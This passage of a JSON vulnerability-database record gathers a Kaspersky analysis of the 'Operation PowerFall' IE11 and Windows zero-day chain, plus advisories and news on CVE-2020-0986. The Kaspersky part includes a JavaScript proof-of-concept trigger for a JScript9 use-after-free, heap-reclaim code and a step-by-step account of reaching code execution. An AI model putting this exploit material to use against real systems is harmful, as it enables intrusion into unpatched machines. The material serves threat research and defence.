groups.\n * Unsurprisingly, we continue to see COVID-19-themed attacks \u2013 this quarter they included WellMess and Sidewinder.\n * Among the most interesting APT campaigns this quarter were DeathStalker and MosaicRegressor: the former underlining the fact that APT groups can achieve their aims without developing highly sophisticated tools; the latter representing the leading-edge in malware development.\n\nAs always, we would note that our reports are the product of our visibility into the threat landscape. However, it should be borne in mind that, while we strive to continually improve, there is always the possibility that other sophisticated attacks may fly under our radar.", "modified": "2020-11-03T10:00:37", "published": "2020-11-03T10:00:37", "id": "SECURELIST:E2805DD2729049C4BBE6F641B5ADA21C", "href": "https://securelist.com/apt-trends-report-q3-2020/99204/", "type": "securelist", "title": "APT trends report Q3 2020", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-13T08:04:21", "bulletinFamily": "blog", "cvelist": ["CVE-2018-8653", "CVE-2019-0676", "CVE-2019-1429", "CVE-2020-0674", "CVE-2020-0986", "CVE-2020-1380"], "description": "\n\n## Executive summary\n\nIn May 2020, Kaspersky technologies prevented an attack on a South Korean company by a malicious script for Internet Explorer. Closer analysis revealed that the attack used a previously unknown full chain that consisted of two zero-day exploits: a remote code execution exploit for Internet Explorer and an elevation of privilege exploit for Windows. Unlike a previous full chain that we discovered, used in Operation WizardOpium, the new full chain targeted the latest builds of Windows 10, and our tests demonstrated reliable exploitation of Internet Explorer 11 and Windows 10 build [18363](<https://docs.microsoft.com/en-us/windows/release-information/>) x64.\n\nOn June 8, 2020, we reported our discoveries to Microsoft, and the company confirmed the vulnerabilities. At the time of our report, the security team at Microsoft had already prepared a patch for vulnerability [CVE-2020-0986](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0986>) that was used in the zero-day elevation of privilege exploit, but before our discovery, the exploitability of this vulnerability was considered less likely. The patch for CVE-2020-0986 was released on June 9, 2020.\n\nMicrosoft assigned [CVE-2020-1380](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1380>) to a use-after-free vulnerability in JScript and the patch was released on August 11, 2020. \n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/12070837/CVE-2020-1380_list.png>)\n\nWe are calling this and related attacks 'Operation PowerFall'. Currently, we are unable to establish a definitive link with any known threat actors, but due to similarities with previously discovered exploits, we believe that [DarkHotel](<https://securelist.com/the-darkhotel-apt/66779/>) may be behind this attack. Kaspersky products detect Operation PowerFall attacks with verdict PDM:Exploit.Win32.Generic.\n\n## Internet Explorer 11 remote code execution exploit\n\nThe most recent zero-day exploits for Internet Explorer discovered in the wild relied on the vulnerabilities CVE-2020-0674, CVE-2019-1429, CVE-2019-0676 and CVE-2018-8653 in the legacy JavaScript engine jscript.dll. In contrast, CVE-2020-1380 is a vulnerability in jscript9.dll, which has been used by default starting with Internet Explorer 9, and because of this, the [mitigation steps](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV200001>) recommended by Microsoft (restricting the usage of jscript.dll) cannot protect against this particular vulnerability.\n\nCVE-2020-1380 is a Use-After-Free vulnerability that is caused by JIT optimization and the lack of necessary checks in just-in-time compiled code. A proof-of-concept (PoC) that triggers vulnerability is demonstrated below:\n \n \n function func(O, A, F, O2) {\n arguments.push = Array.prototype.push;\n O = 1;\n arguments.length = 0;\n arguments.push(O2);\n if (F == 1) {\n O = 2;\n }\n \n // execute abp.valueOf() and write by dangling pointer\n A[5] = O;\n };\n \n // prepare objects\n var an = new ArrayBuffer(0x8c);\n var fa = new Float32Array(an);\n \n // compile func\n func(1, fa, 1, {});\n for (var i = 0; i < 0x10000; i++) {\n func(1, fa, 1, 1);\n }\n \n var abp = {};\n abp.valueOf = function() {\n \n // free \n worker = new Worker('worker.js');\n worker.postMessage(an, [an]);\n worker.terminate();\n worker = null;\n \n // sleep\n var start = Date.now();\n while (Date.now() - start < 200) {}\n \n // TODO: reclaim freed memory\n \n return 0\n };\n \n try {\n func(1, fa, 0, abp);\n } catch (e) {\n reload()\n }\n\nTo understand this vulnerability, let us take a look at how _func()_ is executed. It is important to understand what value is set to _A[5]_. According to the code, it should be an _O_ argument. At function start, the _O_ argument is re-assigned to 1, but then the function arguments length is set to 0. This operation does not clear function arguments (as it would normally do with regular array) but allows to put argument _O2 _into the arguments list at index zero using Array.prototype.push, meaning _O_ = _O2_ now. Besides that, if the argument _F _is equal to 1, then _O_ will be re-assigned once again, but to the integer number 2. It means that depending on the value of the _F _argument, the _O _argument is equal to either the value of the _O2 _argument or the integer number 2. The argument _A_ is a typed array of 32-bit floating point numbers, and before assigning a value to index 5 of the array, this value should be converted to a float. Converting an integer to a float is a relatively simple task, but it become less straightforward when an object is converted to a float number. The exploit uses the object _abp_ with an overridden _valueOf()_ method. This method is executed when the object is converted to a float, but inside the method there is code that frees ArrayBuffer, which is viewed by Float32Array and where the returned value will be set. To prevent the value from being stored in the memory of the freed object, the JavaScript engine needs to check the status of the object before storing the value in it. To convert and store the float value safely, JScript9.dll uses the function _Js::TypedArray<float,0>::BaseTypedDirectSetItem()_. You can see decompiled code of this function below:\n \n \n int Js::TypedArray<float,0>::BaseTypedDirectSetItem(Js::TypedArray<float,0> *this, unsigned int index, void *object, int reserved)\n {\n Js::JavascriptConversion::ToNumber(object, this->type->library->context);\n if ( LOBYTE(this->view[0]->unusable) )\n Js::JavascriptError::ThrowTypeError(this->type->library->context, 0x800A15E4, 0);\n if ( index < this->count )\n {\n *(float *)&this->buffer[4 * index] = Js::JavascriptConversion::ToNumber(\n object,\n this->type->library->context);\n }\n return 1;\n }\n \n double Js::JavascriptConversion::ToNumber(void *object, struct Js::ScriptContext *context)\n {\n if ( (unsigned char)object & 1 )\n return (double)((int)object >> 1);\n if ( *(void **)object == VirtualTableInfo<Js::JavascriptNumber>::Address[0] )\n return *((double *)object + 1);\n return Js::JavascriptConversion::ToNumber_Full(object, context);\n }\n\nThis function checks the _view[0]->unusable_ and _count _fields of the typed float array and when ArrayBuffer is freed during execution of the _valueOf()_ method, both of these checks will fail because _view[0]->unusable _will be set to 1 and _count _will be set to 0 during the first call to _Js::JavascriptConversion::ToNumber()_. The problem lies in the fact that the function _Js::TypedArray<float,0>::BaseTypedDirectSetItem()_ is used only in interpretation mode.\n\nWhen the function _func() _is compiled just in time, the JavaScript engine will use the vulnerable code below.\n \n \n if ( !((unsigned char)floatArray & 1) && *(void *)floatArray == &Js::TypedArray<float,0>::vftable )\n {\n if ( floatArray->count > index )\n {\n buffer = floatArray->buffer + 4*index;\n if ( object & 1 )\n {\n *(float *)buffer = (double)(object >> 1);\n }\n else\n {\n if ( *(void *)object != &Js::JavascriptNumber::vftable )\n {\n Js::JavascriptConversion::ToFloat_Helper(object, (float *)buffer, context);\n }\n else\n {\n *(float *)buffer = *(double *)(object->value);\n }\n }\n }\n }\n\nAnd here is the code of the _Js::JavascriptConversion::ToFloat_Helper()_ function.\n \n \n void Js::JavascriptConversion::ToFloat_Helper(void *object, float *buffer, struct Js::ScriptContext *context)\n {\n *buffer = Js::JavascriptConversion::ToNumber_Full(object, context);\n }\n\nAs you can see, unlike in interpretation mode, in just-in-time compiled code, the life cycle of ArrayBuffer is not checked, and its memory can be freed and then reclaimed during a call to the _valueOf() _function. Additionally, the attacker can control at what index the returned value is written. However, in the case when "arguments.length = 0;"and "arguments.push(O2);" are replaced in PoC with "arguments[0] = O2;" then _Js::JavascriptConversion::ToFloat_Helper() _will not trigger the bug because implicit calls will be disabled and it will not perform a call to the _valueOf()_ function.\n\nTo ensure that the function _func()_ is compiled just in time, the exploit executes this function 0x10000 times, performing a harmless conversion of the integer, and only after that _func()_ is executed once more, triggering the bug. To free ArrayBuffer, the exploit uses a common technique abusing the Web Workers API. The function _postMessage()_ can be used to serialize objects to messages and send them to the worker. As a side effect, transferred objects are freed and become unusable in the current script context. When ArrayBuffer is freed, the exploit triggers garbage collection via code that simulates the use of the _Sleep()_ function: it is a while loop that checks for the time lapse between _Date.now() _and the previously stored value. After that, the exploit reclaims the memory with integer arrays.\n \n \n for (var i = 0; i < T.length; i += 1) {\n T[i] = new Array((0x1000 - 0x20) / 4);\n T[i][0] = 0x666; // item needs to be set to allocate LargeHeapBucket\n }\n\nWhen a large number of arrays is created, Internet Explorer allocates new LargeHeapBlock objects, which are used by IE's custom heap implementation. The LargeHeapBlock objects will store the addresses of buffers allocated for the arrays. If the expected memory layout is achieved successfully, the vulnerability will overwrite the value at the offset 0x14 of LargeHeapBlock with 0, which happens to be the allocated block count.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/03155654/sl_ie11_and_windows_01.png>)\n\n**_LargeHeapBlock structure for jscript9.dll x86_**\n\n_ _After that, the exploit allocates a huge number of arrays and sets them to another array that was prepared at the initial stage of the exploitation. Then this array is set to null, and the exploit makes a call to the _CollectGarbage()_ function. This results in defragmentation of the heap, and the modified LargeHeapBlock will be freed along with its associated array buffers. At this stage, the exploit creates a large amount of integer arrays in hopes of reclaiming the previously freed array buffers. The newly created arrays have a magic value set at index zero, and this value is checked through a dangling pointer to the previously freed array to detect if the exploitation was successful.\n \n \n for (var i = 0; i < K.length; i += 1) {\n K[i] = new Array((0x1000 - 0x20) / 4);\n K[i][0] = 0x888; // store magic\n }\n \n for (var i = 0; i < T.length; i += 1) {\n if (T[i][0] == 0x888) { // find array accessible through dangling pointer\n R = T[i];\n break;\n }\n }\n\nAs a result, the exploit creates two different JavascriptNativeIntArray objects with buffers pointing to the same location. This makes it possible to retrieve the addresses of the objects and even create new malformed objects. The exploit takes advantage of these primitives to create a malformed DataView object and get read/write access to the whole address space of the process.\n\nAfter the building of the arbitrary read/write primitives, it is time to bypass Control Flow Guard (CFG) and get code execution. The exploit uses the Array's vftable pointer to get the module base address of jscript9.dll. From there, it parses the PE header of jscript9.dll to get the address of the Import Directory Table and resolves the base addresses of the other modules. The goal here is to find the address of the function _VirtualProtect()_, which will be used to make the shellcode executable. After that, the exploit searches for two signatures in jscript9.dll. Those signatures correspond to the address of the Unicode string "split" and the address of the function: _JsUtil::DoublyLinkedListElement<ThreadContext>::LinkToBeginning<ThreadContext>()_. The address of the Unicode string "split" is used to get a code reference to the string and with its help, to resolve the address of the function _Js::JavascriptString::EntrySplit()_, which implements the string method _split()_. The address of the function _LinkToBeginning<ThreadContext>() _is used to obtain the address of the first ThreadContext object in the global linked list. The exploit locates the last entry in the linked list and uses it to get the location of the stack for the thread responsible for the execution of the script. After that comes the final stage. The exploit executes the _split() _method and an object with an overridden _valueOf()_ method is provided as a _limit _argument. When the overridden _valueOf()_ method is executed during the execution of the function _Js::JavascriptString::EntrySplit()_, the exploit will search the thread's stack to find the return address, place the shellcode in a prepared buffer, obtain its address, and finally build a return-oriented programming (ROP) chain to execute the shellcode by overwriting the return address of the function.\n\n## Next stage\n\nThe shellcode is a reflective DLL loader for the portable executable (PE) module that is appended to the shellcode. The module is very small in size, and the whole functionality is located inside a single function. It creates a file within a temporary folder with the name ok.exe and writes to it the contents of another executable that is present in the remote code execution exploit. After that, ok.exe is executed.\n\nThe ok.exe executable contains is an elevation of privilege exploit for the arbitrary pointer dereference vulnerability CVE-2020-0986 in the GDI Print / Print Spooler API. Initially, this vulnerability was reported to Microsoft by an anonymous user working with Trend Micro's Zero Day Initiative back in December 2019. Due to the patch not being released for six months since the original report, ZDI posted a public [advisory](<https://www.zerodayinitiative.com/advisories/ZDI-20-663/>) for this vulnerability as a zero-day on May 19, 2020. The next day, the vulnerability was exploited in the previously mentioned attack.\n\nThe vulnerability makes it possible to read and write the arbitrary memory of the splwow64.exe process using interprocess communication, and use it to achieve code execution in the splwow64.exe process, bypassing the CFG and [EncodePointer](<https://docs.microsoft.com/en-us/previous-versions/bb432254\\(v=vs.85\\)>) protection. The exploit comes with two executables embedded in its resources. The first executable is written to disk as CreateDC.exe and is used to create a device context (DC), which is required for exploitation. The second executable has the name PoPc.dll and if the exploitation is successful, it is executed by splwow64.exe with a medium integrity level. We will provide further details on CVE-2020-0986 and its exploitation in a follow-up post.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/03155838/sl_ie11_and_windows_02.png>)\n\n**_Execution of a malicious PowerShell command from splwow64.exe_**\n\nThe main functionality of PoPc.dll is also located inside a single function. It executes an encoded PowerShell command that proceeds to download a file from www[.]static-cdn1[.]com/update.zip, saves it to the temporary folder as upgrader.exe and executes it. We were unable to analyze upgrader.exe because Kaspersky technologies prevented the attack before the executable was downloaded.\n\n## IoCs\n\n[www[.]static-cdn1[.]com/update.zip](<https://opentip.kaspersky.com/www.static-cdn1.com%2Fupdate.zip/>) \n[B06F1F2D3C016D13307BC7CE47C90594](<https://opentip.kaspersky.com/B06F1F2D3C016D13307BC7CE47C90594/>) \n[D02632CFFC18194107CC5BF76AECA7E87E9082FED64A535722AD4502A4D51199](<https://opentip.kaspersky.com/D02632CFFC18194107CC5BF76AECA7E87E9082FED64A535722AD4502A4D51199/>) \n[5877EAECA1FE8A3A15D6C8C5D7FA240B](<https://opentip.kaspersky.com/5877EAECA1FE8A3A15D6C8C5D7FA240B/>) \n[7577E42177ED7FC811DE4BC854EC226EB037F797C3B114E163940A86FD8B078B](<https://opentip.kaspersky.com/7577E42177ED7FC811DE4BC854EC226EB037F797C3B114E163940A86FD8B078B/>) \n[B72731B699922608FF3844CCC8FC36B4](<https://opentip.kaspersky.com/B72731B699922608FF3844CCC8FC36B4/>) \n[7765F836D2D049127A25376165B1AC43CD109D8B9D8C5396B8DA91ADC61ECCB1](<https://opentip.kaspersky.com/7765F836D2D049127A25376165B1AC43CD109D8B9D8C5396B8DA91ADC61ECCB1/>) \n[E01254D7AF1D044E555032E1F78FF38F](<https://opentip.kaspersky.com/E01254D7AF1D044E555032E1F78FF38F/>) \n[81D07CAE45CAF27CBB9A1717B08B3AB358B647397F08A6F9C7652D00DBF2AE24](<https://opentip.kaspersky.com/81D07CAE45CAF27CBB9A1717B08B3AB358B647397F08A6F9C7652D00DBF2AE24/>)", "modified": "2020-08-12T07:00:28", "published": "2020-08-12T07:00:28", "id": "SECURELIST:6E5BCE8A736D28A7E168E1CD5131CE3D", "href": "https://securelist.com/ie-and-windows-zero-day-operation-powerfall/97976/", "type": "securelist", "title": "Internet Explorer and Windows zero-day exploits used in Operation PowerFall", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2021-01-14T21:07:38", "bulletinFamily": "info", "cvelist": ["CVE-2020-0986", "CVE-2020-1237", "CVE-2020-1246", "CVE-2020-1262", "CVE-2020-1264", "CVE-2020-1266", "CVE-2020-1269", "CVE-2020-1273", "CVE-2020-1274", "CVE-2020-1275", "CVE-2020-1276", "CVE-2020-1307", "CVE-2020-1316", "CVE-2020-17008", "CVE-2021-1648"], "description": "An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory, aka \u2018Windows Kernel Elevation of Privilege Vulnerability\u2019. This CVE ID is unique from CVE-2020-1237, CVE-2020-1246, CVE-2020-1262, CVE-2020-1264, CVE-2020-1266, CVE-2020-1269, CVE-2020-1273, CVE-2020-1274, CVE-2020-1275, CVE-2020-1276, CVE-2020-1307, CVE-2020-1316.\n\n \n**Recent assessments:** \n \n**ccondon-r7** at December 28, 2020 5:15pm UTC reported:\n\nGoogle Project Zero researcher Maddie Stone, who originally [disclosed this vulnerability](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2096>) to Microsoft, [reported on December 23, 2020](<https://twitter.com/maddiestone/status/1341781305126612995>) that the patch is incomplete and can be bypassed.\n\nQuoting her [post here](<https://twitter.com/maddiestone/status/1341781306766573568>): \u201cThe original issue was an arbitrary pointer dereference which allowed the attacker to control the src and dest pointers to a memcpy. The \u201cfix\u201d simply changed the pointers to offsets, which still allows control of the args to the memcpy.\u201d\n\nStealing directly from a conversation with Metasploit\u2019s Windows exploit expert **@zeroSteiner**, it sounds like this bug isn\u2019t terribly useful as an LPE \u201cbecause the slpwow64 process doesn\u2019t run with elevated privileges\u2014just an elevated integrity, which Microsoft doesn\u2019t consider a security boundary anymore anyway.\u201d Project Zero-reported vulns tend to draw media and researcher attention and there\u2019s quite a lot of detail publicly available between Stone\u2019s original report and this in-depth [Kaspersky write-up](<https://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/>), so we may see more exploitation even if the impact of the bug by itself isn\u2019t terribly high. That said, the Kaspersky analysis is definitely worth a read if you want to understand this CVE\u2019s utility for the IE 11 use case!\n\nAssessed Attacker Value: 2 \nAssessed Attacker Value: 4**gwillcox-r7** at November 22, 2020 2:32am UTC reported:\n\nGoogle Project Zero researcher Maddie Stone, who originally [disclosed this vulnerability](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2096>) to Microsoft, [reported on December 23, 2020](<https://twitter.com/maddiestone/status/1341781305126612995>) that the patch is incomplete and can be bypassed.\n\nQuoting her [post here](<https://twitter.com/maddiestone/status/1341781306766573568>): \u201cThe original issue was an arbitrary pointer dereference which allowed the attacker to control the src and dest pointers to a memcpy. The \u201cfix\u201d simply changed the pointers to offsets, which still allows control of the args to the memcpy.\u201d\n\nStealing directly from a conversation with Metasploit\u2019s Windows exploit expert **@zeroSteiner**, it sounds like this bug isn\u2019t terribly useful as an LPE \u201cbecause the slpwow64 process doesn\u2019t run with elevated privileges\u2014just an elevated integrity, which Microsoft doesn\u2019t consider a security boundary anymore anyway.\u201d Project Zero-reported vulns tend to draw media and researcher attention and there\u2019s quite a lot of detail publicly available between Stone\u2019s original report and this in-depth [Kaspersky write-up](<https://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/>), so we may see more exploitation even if the impact of the bug by itself isn\u2019t terribly high. That said, the Kaspersky analysis is definitely worth a read if you want to understand this CVE\u2019s utility for the IE 11 use case!\n", "modified": "2020-07-24T00:00:00", "published": "2020-06-09T00:00:00", "id": "AKB:0E829C08-804A-436D-A730-1B474A82E4A7", "href": "https://attackerkb.com/topics/bQeeJLG1aP/cve-2020-0986", "type": "attackerkb", "title": "CVE-2020-0986", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "zdi": [{"lastseen": "2020-06-22T11:42:06", "bulletinFamily": "info", "cvelist": ["CVE-2020-0986"], "description": "This vulnerability allows local attackers to escalate privileges on affected installations of Microsoft Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the user-mode printer driver host process splwow64.exe. The issue results from the lack of proper validation of a user-supplied value prior to dereferencing it as a pointer. An attacker can leverage this vulnerability to escalate privileges from low integrity and execute code in the context of the current user at medium integrity.", "edition": 1, "modified": "2020-06-22T00:00:00", "published": "2020-05-19T00:00:00", "id": "ZDI-20-663", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-663/", "title": "(0Day) Microsoft Windows splwow64 Untrusted Pointer Dereference Privilege Escalation Vulnerability", "type": "zdi", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "mscve": [{"lastseen": "2020-08-07T11:45:29", "bulletinFamily": "microsoft", "cvelist": ["CVE-2020-0986"], "description": "An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nTo exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application to take control of an affected system.\n\nThe update addresses the vulnerability by correcting how the Windows kernel handles objects in memory.\n", "edition": 2, "modified": "2020-06-09T07:00:00", "id": "MS:CVE-2020-0986", "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0986", "published": "2020-06-09T07:00:00", "title": "Windows Kernel Elevation of Privilege Vulnerability", "type": "mscve", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2020-12-28T06:21:40", "bulletinFamily": "info", "cvelist": ["CVE-2020-0986", "CVE-2020-17008"], "description": "[](<https://thehackernews.com/images/-WK9xrOIlPVc/X-RYcAJN2cI/AAAAAAAABV4/SYDr63wXxioAhyy_OmTToTSb2-lArPb5ACLcBGAsYHQ/s0/windows.jpg>)\n\nGoogle's Project Zero team has made public details of an improperly patched zero-day security vulnerability in Windows print spooler API that could be leveraged by a bad actor to execute arbitrary code.\n\nDetails of the unpatched flaw were revealed publicly after Microsoft failed to rectify it within 90 days of responsible disclosure on September 24.\n\nOriginally tracked as [CVE-2020-0986](<https://googleprojectzero.blogspot.com/p/rca-cve-2020-0986.html>), the flaw concerns an elevation of privilege exploit in the GDI Print / [Print Spooler](<https://docs.microsoft.com/en-us/windows-hardware/drivers/print/introduction-to-printing>) API (\"splwow64.exe\") that was reported to Microsoft by an anonymous user working with Trend Micro's Zero Day Initiative (ZDI) back in late December 2019.\n\nBut with no patch in sight for about six months, ZDI ended up posting a public [advisory](<https://www.zerodayinitiative.com/advisories/ZDI-20-663/>) as a zero-day on May 19 earlier this year, after which it was [exploited](<https://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/>) in the wild in a campaign dubbed \"[Operation PowerFall](<https://securelist.com/ie-and-windows-zero-day-operation-powerfall/97976/>)\" against an unnamed South Korean company.\n\n\"splwow64.exe\" is a Windows core system binary that allows 32-bit applications to connect with the 64-bit printer spooler service on 64-bit Windows systems. It implements a Local Procedure Call ([LPC](<https://en.wikipedia.org/wiki/Local_Inter-Process_Communication>)) server that can be used by other processes to access printing functions.\n\n[](<https://thehackernews.com/images/-2-ux57hW8ck/X-RaBqZDyzI/AAAAAAAA3fU/tAWWkpJ90zwym1bZ24XlJIKgzoOu537kgCLcBGAsYHQ/s0/tweet.jpg>)\n\nSuccessful exploitation of this vulnerability could result in an attacker manipulating the memory of the \"splwow64.exe\" process to achieve execution of arbitrary code in kernel mode, ultimately using it to install malicious programs; view, change, or delete data; or create new accounts with full user rights.\n\nHowever, to achieve this, the adversary would first have to log on to the target system in question.\n\nAlthough Microsoft eventually [addressed](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0986>) the shortcoming as part of its June Patch Tuesday update, new findings from Google's security team reveals that the flaw has not been fully remediated.\n\n\"The vulnerability still exists, just the exploitation method had to change,\" Google Project Zero researcher Maddie Stone [said](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2096>) in a write-up.\n\n\"The original issue was an arbitrary pointer dereference which allowed the attacker to control the src and dest pointers to a memcpy,\" Stone [detailed](<https://twitter.com/maddiestone/status/1341781305126612995>). \"The 'fix' simply changed the pointers to offsets, which still allows control of the args to the memcpy.\"\n\nThe newly reported elevation of privilege flaw, identified as CVE-2020-17008, is expected to be resolved by Microsoft on January 12, 2021, due to \"issues identified in testing\" after promising an initial fix in November.\n\nStone has also shared a proof-of-concept (PoC) exploit code for CVE-2020-17008, based off of a PoC released by Kaspersky for CVE-2020-0986\n\n\"There have been too many occurrences this year of zero-days known to be actively exploited being fixed incorrectly or incompletely,\" Stone [said](<https://twitter.com/maddiestone/status/1341781305126612995>). \"When [in the wild] zero-days aren't fixed completely, attackers can reuse their knowledge of vulnerabilities and exploit methods to easily develop new zero-days.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "modified": "2020-12-28T06:17:30", "published": "2020-12-24T09:01:00", "id": "THN:279CDD851D8F33C8B07217F8D20F6AAA", "href": "https://thehackernews.com/2020/12/google-discloses-poorly-patched-now.html", "type": "thn", "title": "Google Discloses Poorly-Patched, Now Unpatched, Windows 0-Day Bug", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2020-12-24T21:57:52", "bulletinFamily": "info", "cvelist": ["CVE-2020-0986", "CVE-2020-17008"], "description": "A high-severity Windows zero-day that could lead to complete desktop takeover remains dangerous after a \u201cfix\u201d from Microsoft failed to adequately patch it.\n\nThe local privilege-escalation bug in Windows 8.1 and Windows 10 (CVE-2020-0986) exists in the Print Spooler API. It could allow a local attacker to elevate privileges and execute code in the context of the current user, according to [Microsoft\u2019s advisory](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0986>) issued in June. An attacker would first have to log on to the system, but could then run a specially crafted application to take control of an affected system.\n\n\u201cThe issue arises because the Windows kernel fails to properly handle objects in memory,\u201d the firm said. \u201cAn attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\u201d\n\n[](<https://threatpost.com/2020-reader-survey/161168/>)\n\nThe bug rates 8.3 out of 10 on the CVSS vulnerability-severity scale.\n\nFrom a more technical perspective, \u201cthe specific flaw exists within the user-mode printer driver host process splwow64.exe,\u201d according to [an advisory](<https://www.zerodayinitiative.com/advisories/ZDI-20-663/>) from Trend Micro\u2019s Zero Day Initiative (ZDI), which reported the bug to Microsoft last December. \u201cThe issue results from the lack of proper validation of a user-supplied value prior to dereferencing it as a pointer.\u201d\n\nThe issue remained unpatched for six months. In the meantime, Kaspersky observed it being [exploited in the wild](<https://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/>) in May against a South Korean company, as part of an exploit chain that also used a remote code-execution zero-day bug in Internet Explorer. That campaign, dubbed Operation Powerfall, was believed to be initiated by the advanced persistent threat (APT) [known as Darkhotel](<https://threatpost.com/who-attacked-possible-apt-covid-19-cyberattacks-double/154083/>).\n\nMicrosoft\u2019s June update included a patch that \u201caddresses the vulnerability by correcting how the Windows kernel handles objects in memory.\u201d However, Maddie Stone, researcher with Google Project Zero, has now disclosed that the fix was faulty, after Microsoft failed to re-patch it within 90 days of being alerted to the problem.\n\n\u201cMicrosoft released a patch in June, but that patch didn\u2019t fix the vuln,\u201d [she tweeted](<https://twitter.com/maddiestone/status/1341781306766573568>) on Wednesday. \u201cAfter reporting that bad fix in Sept. under a 90-day deadline, it\u2019s still not fixed.\u201d\n\nShe added, \u201cThe original issue was an arbitrary pointer dereference which allowed the attacker to control the src and dest pointers to a memcpy. The \u2018fix\u2019 simply changed the pointers to offsets, which still allows control of the args to the memcpy.\u201d\n\nMicrosoft has issued a new CVE, [CVE-2020-17008](<https://www.cybersecurity-help.cz/vdb/SB2020122401>), and researchers expect a patch in January. Project Zero meanwhile has issued [public proof-of-concept code](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2096>) for the issue.\n\n**Download our exclusive **[**FREE Threatpost Insider eBook**](<https://threatpost.com/ebooks/healthcare-security-woes-balloon-in-a-covid-era-world/?utm_source=FEATURE&utm_medium=FEATURE&utm_campaign=Nov_eBook>) _**Healthcare Security Woes Balloon in a Covid-Era World**_** , sponsored by ZeroNorth, to learn more about what these security risks mean for hospitals at the day-to-day level and how healthcare security teams can implement best practices to protect providers and patients. Get the whole story and **[**DOWNLOAD the eBook now**](<https://threatpost.com/ebooks/healthcare-security-woes-balloon-in-a-covid-era-world/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_eBook>)** \u2013 on us!**\n", "modified": "2020-12-24T16:31:38", "published": "2020-12-24T16:31:38", "id": "THREATPOST:52B00377F0B400F0EFF0B3C4FF948F6F", "href": "https://threatpost.com/windows-zero-day-circulating-faulty-fix/162610/", "type": "threatpost", "title": "Windows Zero-Day Still Circulating After Faulty Fix", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2020-07-21T19:51:33", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-1253", "CVE-2020-1207", "CVE-2020-1287", "CVE-2020-1272", "CVE-2020-1300", "CVE-2020-0916", "CVE-2020-1220", "CVE-2020-1263", "CVE-2020-1310", "CVE-2020-1251", "CVE-2020-1301", "CVE-2020-1254", "CVE-2020-1212", "CVE-2020-1213", "CVE-2020-1219", "CVE-2020-1160", "CVE-2020-1236", "CVE-2020-1311", "CVE-2020-1317", "CVE-2020-1334", "CVE-2020-0986", "CVE-2020-1262", "CVE-2020-1215", "CVE-2020-1231", "CVE-2020-1281", "CVE-2020-1255", "CVE-2020-1299", "CVE-2020-1302", "CVE-2020-1216", "CVE-2020-1247", "CVE-2020-1246", "CVE-2020-1348", "CVE-2020-1314", "CVE-2020-1282", "CVE-2020-1208", "CVE-2020-1239", "CVE-2020-1214", "CVE-2020-1194", "CVE-2020-0915", "CVE-2020-1196", "CVE-2020-1315", "CVE-2020-1230", "CVE-2020-1270", "CVE-2020-1291", "CVE-2020-1260"], "description": "This host is missing a critical security\n update according to Microsoft KB4561612", "modified": "2020-07-16T00:00:00", "published": "2020-06-10T00:00:00", "id": "OPENVAS:1361412562310817063", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310817063", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4561612)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n 